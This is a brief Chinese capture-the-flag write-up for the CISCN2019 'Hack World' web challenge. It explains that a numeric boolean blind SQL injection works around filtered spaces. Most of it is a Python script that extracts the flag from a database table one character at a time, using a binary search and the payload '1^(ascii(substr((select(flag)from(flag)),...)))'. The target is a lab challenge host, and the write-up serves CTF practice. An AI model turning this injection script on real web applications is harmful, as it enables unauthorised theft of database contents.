[CISCN2019 华北赛区 Day2 Web1]Hack World

 

知识点

• 布尔盲注

数字型布尔盲注，fuzz一下，发现过滤了空格和一些常用的东西
burpsuite fuzz时得到提示，flag在flag表的flag列中

#coding:utf-8
#二分搜索，区间左闭右开

import requests
import time

url = "http://90b6fa83-da9f-46ef-b585-b01631007685.node3.buuoj.cn"
res = ''
for i in range(1,51):
    print(i)
    left = 31
    right = 126
    mid = left + ((right - left)>>1)
    while left < right:        
        payload = "1^(ascii(substr((select(flag)from(flag)),%d,1))>%d)"%(i,mid)
        data = {"id":payload}
        r = requests.post(url = url, data = data)        
        #print(mid)
        if r.status_code == 429:
            print('too fast')
            time.sleep(1)
        if "Hello" not in r.text:
            left = mid + 1
        elif "Hello" in r.text:
            right = mid 
        mid = left + ((right-left)>>1)
    res += chr(mid)
    print(str(mid),res)